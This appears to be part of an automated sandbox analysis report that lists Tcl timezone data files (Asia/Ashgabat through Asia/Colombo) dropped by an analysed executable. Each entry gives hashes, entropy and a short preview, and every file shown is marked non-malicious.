                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Ashgabat)]} {.. LoadTimeZoneFile Asia/Ashgabat..}..set TZData(:Asia/Ashkhabad) $TZData(:Asia/Ashgabat)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1666
                                                                                                                                                                                                                              Entropy (8bit):3.7265766742957402
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:55TvFlvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIQvyovklvqQJ:XrFBNKs6b03zB0WJEuDa7sFZiKWaN6Tl
                                                                                                                                                                                                                              MD5:0236793F90ABC6F68718DDBB44AF5E2F
                                                                                                                                                                                                                              SHA1:A5EFAEEF9B9159E748A3FED231F8A978E400482E
                                                                                                                                                                                                                              SHA-256:4B7B118E6AE72D41740CF0CB2BD8E970700758DCBC0DD6F298199D841DF8408E
                                                                                                                                                                                                                              SHA-512:851C7A9C110790454312BB9C5B5D3C426365EEF4673191B9ABB2E4A32301894C5FB1ADCBE2A4C67BEE416AD63FB8BED85F94EF9BF42473DA4BFFA7824935A1D5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Atyrau) {.. {-9223372036854775808 12464 0 LMT}.. {-1441164464 10800 0 +03}.. {-1247540400 18000 0 +05}.. {370724400 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990800 18000 0 +05}.. {764715
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1702
                                                                                                                                                                                                                              Entropy (8bit):3.7261419515679393
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5/eVvyGiHD6UC4UrUomFMmUZcjbUKNFcUEUvUOpU8MYUWCUlbf/U9bUiUUybUQUF:5m8G9mFdnNF1FfsTuvQXHCe
                                                                                                                                                                                                                              MD5:690013310A46BD1AE250A5E019353809
                                                                                                                                                                                                                              SHA1:0DF434C7EEB707DC071007FAB112F4DEB37E936F
                                                                                                                                                                                                                              SHA-256:D20B75D2604C3B742C1629C5EE02CFF6783E472249982B272B68F2A6DE9BDC38
                                                                                                                                                                                                                              SHA-512:FF8C33E55E4F006C38D3FD37A1AD3E1200718CA374ECBEAE8255C7635912F0BB23A59A600BF7130D5660A24C515F726E8440D0D908E560CB59F74059638E6AA2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Baghdad) {.. {-9223372036854775808 10660 0 LMT}.. {-2524532260 10656 0 BMT}.. {-1641005856 10800 0 +03}.. {389048400 14400 0 +03}.. {402264000 10800 0 +03}.. {417906000 14400 1 +03}.. {433800000 10800 0 +03}.. {449614800 14400 1 +03}.. {465422400 10800 0 +03}.. {481150800 14400 1 +03}.. {496792800 10800 0 +03}.. {512517600 14400 1 +03}.. {528242400 10800 0 +03}.. {543967200 14400 1 +03}.. {559692000 10800 0 +03}.. {575416800 14400 1 +03}.. {591141600 10800 0 +03}.. {606866400 14400 1 +03}.. {622591200 10800 0 +03}.. {638316000 14400 1 +03}.. {654645600 10800 0 +03}.. {670464000 14400 1 +03}.. {686275200 10800 0 +03}.. {702086400 14400 1 +03}.. {717897600 10800 0 +03}.. {733622400 14400 1 +03}.. {749433600 10800 0 +03}.. {765158400 14400 1 +03}.. {780969600 10800 0 +03}.. {796694400 14400 1 +03}.. {812505600 10800 0 +03}.. {82831
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):171
                                                                                                                                                                                                                              Entropy (8bit):4.784355129067593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8hkXHAIgNvZORL/2WFKENUKMFB/4WFKKB:SlSWB9vsM3yBkHAIgPON/2wKENUr/4wT
                                                                                                                                                                                                                              MD5:1B5E0D449DAEF469D586A853CB3073AD
                                                                                                                                                                                                                              SHA1:FD735B0472B31644E787767B82B737CC39EC4175
                                                                                                                                                                                                                              SHA-256:3D437037FBF2BBDF969C8E71967080947F24860D431B39F5D8F23151316ABCD5
                                                                                                                                                                                                                              SHA-512:2A2DC33D4258A5E1AE59172883F3B11723798ED35CF5AF1B8BA81A8807DC6F8222C8044D82B152EF6AF43E7350FEB2625D4406C6C7DD309CE65810EA3D3286B6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Qatar)]} {.. LoadTimeZoneFile Asia/Qatar..}..set TZData(:Asia/Bahrain) $TZData(:Asia/Qatar)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2149
                                                                                                                                                                                                                              Entropy (8bit):3.6155622322573713
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5/eFdqlykbocXcwJUE5iu8JmFebARoc9lVNk7/9bq8dq16b3C9UPBUTIEjvZJ+76:5RsUf8mFpNWFny1ZGMte3aivUKo
                                                                                                                                                                                                                              MD5:294DFC98F67AC00A188EC3D3B87C501C
                                                                                                                                                                                                                              SHA1:93C434CD9AA170E35AD676C88EE09986A94EC02A
                                                                                                                                                                                                                              SHA-256:873E8F08B87610D0DAFE239D32345248A4595C6B13D1DA83EC214D78E88FA12C
                                                                                                                                                                                                                              SHA-512:5346082CCA733724C0D2C36B768467E59BA9ED6452B6CF1BA923AF4F0D2BC05C67DB49E804CA81DAD449D30D0835026D708D9AB632D02FDA1EA1A0BF717111DE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Baku) {.. {-9223372036854775808 11964 0 LMT}.. {-1441163964 10800 0 +03}.. {-405140400 14400 0 +04}.. {354916800 18000 1 +04}.. {370724400 14400 0 +04}.. {386452800 18000 1 +04}.. {402260400 14400 0 +04}.. {417988800 18000 1 +04}.. {433796400 14400 0 +04}.. {449611200 18000 1 +04}.. {465343200 14400 0 +04}.. {481068000 18000 1 +04}.. {496792800 14400 0 +04}.. {512517600 18000 1 +04}.. {528242400 14400 0 +04}.. {543967200 18000 1 +04}.. {559692000 14400 0 +04}.. {575416800 18000 1 +04}.. {591141600 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 10800 0 +03}.. {670374000 14400 1 +03}.. {686098800 10800 0 +03}.. {701823600 14400 1 +03}.. {717548400 14400 0 +04}.. {820440000 14400 0 +04}.. {828234000 18000 1 +05}.. {846378000 14400 0 +04}.. {852062400
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.911309754748998
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKELYOiMXGm2OHB+keoHvZKmrROpDovFFsQ+8EXVeVSYe:SlSWB9eg/2wKELeDm2OHxeoHvZ3FO1og
                                                                                                                                                                                                                              MD5:9AC4947AC29C797055B7EBFA4F6AC710
                                                                                                                                                                                                                              SHA1:E7758A9A8BFA255F6B2D27F5366D9FE2A26DDF6C
                                                                                                                                                                                                                              SHA-256:6E72BA908F250FD45D554A12E3E7B3BD2F1C02A6C2431F806FD2A054F843AA90
                                                                                                                                                                                                                              SHA-512:F9D0F0CB7D3726C2AB3B5049429172D9DD4BA21353F6F98570CBA4EE969F7D97BD973CB165AECFF930AFFA8633E8052624D44EE7FB91763681ED3F78A61F4F98
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Bangkok) {.. {-9223372036854775808 24124 0 LMT}.. {-2840164924 24124 0 BMT}.. {-1570084924 25200 0 +07}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2117
                                                                                                                                                                                                                              Entropy (8bit):3.7025684250364725
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5VeTtXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFEnsr:5n40yVRB7VfXucdKmtTTDOV
                                                                                                                                                                                                                              MD5:6CC13B6910412A3A3D16CA36ADF00352
                                                                                                                                                                                                                              SHA1:061CF4A8FEA8C139F50F96E6B6506B50ED3DD792
                                                                                                                                                                                                                              SHA-256:992F93A7975F8CD4E94D96B3BA1ECFB3585E52A53F4442A15993402D3F955F66
                                                                                                                                                                                                                              SHA-512:4E9750B1C3C0BA4F7922BCBC76276A3E74031D78A98E21DC59F66D6EA8E1B70865BBEB50A6B77EB0423421A18428B97B47412053CE15213128CEED669F4DD6E8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Barnaul) {.. {-9223372036854775808 20100 0 LMT}.. {-1579844100 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {76470
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8024
                                                                                                                                                                                                                              Entropy (8bit):3.7230911686481774
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:4nBKPP8LFH0TDkywaZb1QSCK5VUjiO1PoBQpo7778CZicJZS80EGcLt4Mok1MgJl:4M38LCRZb+sAiO1PoBQpo1ikjD
                                                                                                                                                                                                                              MD5:1D99E2BBB01B1669403CFBAF7E03F733
                                                                                                                                                                                                                              SHA1:DBDD58C7FD195FC602C4541D6F416CC96094C121
                                                                                                                                                                                                                              SHA-256:17AF14646D562AFE17DCCFD1D2FBA95C122F3E0263906A36EB48BFF04ACF233E
                                                                                                                                                                                                                              SHA-512:98524E8DCD17C090058F17BDA1200D9801EB1B14EB5CEB8C31149A4A402A53BA4923A2AFF457E0A72DAA601D88095247806F945F704000F874FCBF73631DD135
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Beirut) {.. {-9223372036854775808 8520 0 LMT}.. {-2840149320 7200 0 EET}.. {-1570413600 10800 1 EEST}.. {-1552186800 7200 0 EET}.. {-1538359200 10800 1 EEST}.. {-1522551600 7200 0 EET}.. {-1507514400 10800 1 EEST}.. {-1490583600 7200 0 EET}.. {-1473645600 10800 1 EEST}.. {-1460948400 7200 0 EET}.. {-399866400 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336794400 10800 1 EEST}.. {-323578800 7200 0 EET}.. {-305172000 10800 1 EEST}.. {-291956400 7200 0 EET}.. {-273636000 10800 1 EEST}.. {-260420400 7200 0 EET}.. {78012000 10800 1 EEST}.. {86734800 7200 0 EET}.. {105055200 10800 1 EEST}.. {118270800 7200 0 EET}.. {136591200 10800 1 EEST}.. {149806800 7200 0 EET}.. {168127200 10800 1 EEST}.. {181342800 7200 0 EET}.. {199749600 10800 1 EEST}.. {212965200 7200 0 EET}.. {231285600 10800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1669
                                                                                                                                                                                                                              Entropy (8bit):3.7443715330695735
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5qvdJqxiF0rvK5XvV4vUzvCjvT7voPvkPvJUbvn0vYpv99v3uvuWvKJhv3T:Ad1mzK5/VkULCbTjoHkHJUDnQYV9p3mO
                                                                                                                                                                                                                              MD5:1EE8FF3DF0D931A140ADBB021EB3BFEB
                                                                                                                                                                                                                              SHA1:F1F15EF70C4E9F456849AF89CAC97AD747D9E192
                                                                                                                                                                                                                              SHA-256:1D5E9A8F6A04273AF741F648EF10718B004A60D7884FE432DDF85A8F558BEA98
                                                                                                                                                                                                                              SHA-512:155539A5CF21A34FBFACBF1652D934BF32255F4E505E60B3B4D8B5F2F7FAE552E6CB4824D8608A9C56370F58E48702335995BBD16B7A296A86A72A615FBC8ABC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Bishkek) {.. {-9223372036854775808 17904 0 LMT}.. {-1441169904 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 18000 0 +05}.. {670366800 21600 1 +05}.. {683586000 18000 0 +05}.. {703018800 21600 1 +05}.. {717530400 18000 0 +05}.. {734468400 21600 1 +05}.. {748980000 18000 0 +05}.. {765918000 21600 1 +05}.. {78042
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                                                                              Entropy (8bit):4.949517569857329
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8kLP/vXHAIgN16L1RL/2WFKXeAMM7QWFKPLPyn:SlSWB9vsM3yELPHAIg+L1N/2wK0oQwKW
                                                                                                                                                                                                                              MD5:716D842F23974137C5E07A1A65CEFC5D
                                                                                                                                                                                                                              SHA1:C7248C9DBD6AE5AF33BD4B3602D17737EBE023A0
                                                                                                                                                                                                                              SHA-256:F3110E9DD514E3654A9DE777E22B2D2391692927954B4B7E42ED54AB665C3CF5
                                                                                                                                                                                                                              SHA-512:4EC012EAABE60728D9447EEDF4BA7B16CA82786AA39EE79B2F9B32F227F9816FCE42F173153261F9AF88A12209752E84EBD7170C54D126C2DBB1ED3A8D069668
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Kuching)]} {.. LoadTimeZoneFile Asia/Kuching..}..set TZData(:Asia/Brunei) $TZData(:Asia/Kuching)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.774027471796823
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq864DyXHAIgN1QvRL/2WFKh0s+WFKvovn:SlSWB9vsM3ya4DSHAIgcvN/2wKN+wKvy
                                                                                                                                                                                                                              MD5:8BB098AB77CB0469B1FA0E0B64C4A9E7
                                                                                                                                                                                                                              SHA1:88C73626985071DD0923E1CAB343ACCD854A7297
                                                                                                                                                                                                                              SHA-256:1BAEF7850111D2C33B2A766A8AE804534ABA1711BF80A4087A89656DDD8469D5
                                                                                                                                                                                                                              SHA-512:82216A7F787AF20A4C97C7AA754CD6BE979FEF24137CF9A8B18EECA5E8FBCF12834DD8A6FC9CD2357D807F1629806745B46B11DC0472E0284E18DCCC983897DE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Kolkata)]} {.. LoadTimeZoneFile Asia/Kolkata..}..set TZData(:Asia/Calcutta) $TZData(:Asia/Kolkata)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2086
                                                                                                                                                                                                                              Entropy (8bit):3.6981807774781017
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5Bpr1gIgWH/lt0irzEzCSCItWiIrW+rDQk9CVhyFY7rRWjYuhUmgr2M:95PhtjLiII2ZFlgd
                                                                                                                                                                                                                              MD5:69E03A5CEB689E19B60168C0F7EBAE8E
                                                                                                                                                                                                                              SHA1:95C6396EB753753B4FE4AE1B98D76332523E72A4
                                                                                                                                                                                                                              SHA-256:10B6F435B05D887176A4D90CA5AC957F327F62F36F15D6F6E4F81844662429B9
                                                                                                                                                                                                                              SHA-512:DFA72EDC54A11F0840ADBEE7F5AD8EA472AA52A1F196292F1341CD92A68FB2EC0A5BC7DE6C8E83C975420DB4B76CECD4393370FDB2C09F86EC11A50E540F6F02
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Chita) {.. {-9223372036854775808 27232 0 LMT}.. {-1579419232 28800 0 +08}.. {-1247558400 32400 0 +10}.. {354898800 36000 1 +10}.. {370706400 32400 0 +09}.. {386434800 36000 1 +10}.. {402242400 32400 0 +09}.. {417970800 36000 1 +10}.. {433778400 32400 0 +09}.. {449593200 36000 1 +10}.. {465325200 32400 0 +09}.. {481050000 36000 1 +10}.. {496774800 32400 0 +09}.. {512499600 36000 1 +10}.. {528224400 32400 0 +09}.. {543949200 36000 1 +10}.. {559674000 32400 0 +09}.. {575398800 36000 1 +10}.. {591123600 32400 0 +09}.. {606848400 36000 1 +10}.. {622573200 32400 0 +09}.. {638298000 36000 1 +10}.. {654627600 32400 0 +09}.. {670352400 28800 0 +09}.. {670356000 32400 1 +09}.. {686080800 28800 0 +08}.. {695757600 32400 0 +10}.. {701802000 36000 1 +10}.. {717526800 32400 0 +09}.. {733251600 36000 1 +10}.. {748976400 32400 0 +09}.. {7647012
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1619
                                                                                                                                                                                                                              Entropy (8bit):3.775783980828041
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5th5fSW2sp4Qh2rRSQnGw7GywvWbC25XrMYWG4AIQTUhp9pkTGdXguHaena44XY5:rh5kpmWG29QFUmD
                                                                                                                                                                                                                              MD5:540A7304A62ABB8D7F84454ABD6E2556
                                                                                                                                                                                                                              SHA1:52C37529929218A668D7A4AD6FD1B5FE0A727E16
                                                                                                                                                                                                                              SHA-256:94B2C14EF45C695EF6B19D94722E1BCBB629A595F2866DBA80F00A66721040B5
                                                                                                                                                                                                                              SHA-512:3B535D109DB369E301D6B412F21EC990976B997826F22B2E16ECEEEB048D60F064C7CA1A616393DC2F1B491BAC0548DC0965B9EA149A95280FFDBCAD6726EF0F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Choibalsan) {.. {-9223372036854775808 27480 0 LMT}.. {-2032933080 25200 0 +07}.. {252435600 28800 0 +08}.. {417974400 36000 0 +09}.. {433778400 32400 0 +09}.. {449593200 36000 1 +09}.. {465314400 32400 0 +09}.. {481042800 36000 1 +09}.. {496764000 32400 0 +09}.. {512492400 36000 1 +09}.. {528213600 32400 0 +09}.. {543942000 36000 1 +09}.. {559663200 32400 0 +09}.. {575391600 36000 1 +09}.. {591112800 32400 0 +09}.. {606841200 36000 1 +09}.. {622562400 32400 0 +09}.. {638290800 36000 1 +09}.. {654616800 32400 0 +09}.. {670345200 36000 1 +09}.. {686066400 32400 0 +09}.. {701794800 36000 1 +09}.. {717516000 32400 0 +09}.. {733244400 36000 1 +09}.. {748965600 32400 0 +09}.. {764694000 36000 1 +09}.. {780415200 32400 0 +09}.. {796143600 36000 1 +09}.. {811864800 32400 0 +09}.. {828198000 36000 1 +09}.. {843919200 32400 0 +09}.. {8596
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.865222436335267
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qvfXHAIgNtaYFARL/2WFKh2V7/4WFKdy:SlSWB9vsM3yMPHAIgO8AN/2wKho4wKU
                                                                                                                                                                                                                              MD5:C5DC40C6325391F7247251ADB2C07F78
                                                                                                                                                                                                                              SHA1:3DDB1BF94532FB1F1271095B9C8CAA779BC545EF
                                                                                                                                                                                                                              SHA-256:A87382DC5F3C3141547A65E3746AF1DAF94B51468B96DA6CEF30E95754C97D37
                                                                                                                                                                                                                              SHA-512:062FF8D5E5392E5372B0405EDF3C7CF997AC33F95EBFFAA9CC9AB82BBE27B60C80255FCCEE9E6F5E02CBFCB163F99984BB2103217FFD1F80BDEC5C684BF2F61A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Shanghai)]} {.. LoadTimeZoneFile Asia/Shanghai..}..set TZData(:Asia/Chongqing) $TZData(:Asia/Shanghai)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.889115378893491
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qvfXHAIgNtaYFARL/2WFK7LeL9J4WFKdy:SlSWB9vsM3yMPHAIgO8AN/2wK7LUT4wj
                                                                                                                                                                                                                              MD5:C3676771EB813B346F58A7B574D0D7B5
                                                                                                                                                                                                                              SHA1:A473EF621309E019F29F3DEF95C38593775B8404
                                                                                                                                                                                                                              SHA-256:D6D2B4A761C547F1F853AE901AC71AB49FBE825037079C4E0C89DC940AE4A822
                                                                                                                                                                                                                              SHA-512:21C3A5D499E6E0427FBF585CA8CC5D99D193C586483AB107C4D8E9F9DC8412021E8E019A314757DAFE1225D2635F6D48E9C54A511709863F22A02449FA201E02
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Shanghai)]} {.. LoadTimeZoneFile Asia/Shanghai..}..set TZData(:Asia/Chungking) $TZData(:Asia/Shanghai)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):369
                                                                                                                                                                                                                              Entropy (8bit):4.465596050904646
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKr+iDm2OHgoHvZv9tdvjSWV/FSQipPUrKkTD/k5QqRVVFSQOR/UIp:MB862zZmdHgCvZvJvj1Nj+Phkv/YtvjA
                                                                                                                                                                                                                              MD5:9541BB43E79AB0C6E8163945B5BFB1BF
                                                                                                                                                                                                                              SHA1:C4994420DB8313DECDE19B4B9F6C5DB0126A95A7
                                                                                                                                                                                                                              SHA-256:E5B5E6D607A15DA65CB00C92C35A63EAF25F547E64CB34BB419CB8CFC2714B1B
                                                                                                                                                                                                                              SHA-512:46F623B3F7CF8A50F97DD812521398EB9100C9CDFB967C18EF1BD112306AAEB3C9CB224424E48611CB8CC21D1DC3D820DD83032D12BC9DF19301CF07786FA664
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Colombo) {.. {-9223372036854775808 19164 0 LMT}.. {-2840159964 19172 0 MMT}.. {-2019705572 19800 0 +0530}.. {-883287000 21600 1 +06}.. {-862639200 23400 1 +0630}.. {-764051400 19800 0 +0530}.. {832962600 23400 0 +0630}.. {846266400 21600 0 +06}.. {1145039400 19800 0 +0530}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):169
                                                                                                                                                                                                                              Entropy (8bit):4.786111096226559
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8ntyXHAIgN6KyFvRL/2WFK1S2WFKwBn:SlSWB9vsM3yHtSHAIgMKON/2wKM2wKwB
                                                                                                                                                                                                                              MD5:BA575D37459540907A644438071277F8
                                                                                                                                                                                                                              SHA1:14CF10D6AABBAF7BAE42B3B9641D8469C206567F
                                                                                                                                                                                                                              SHA-256:B3AD560F66EA330E54A147017E6E6AB64452A5255D097B962D540836D7B19EE7
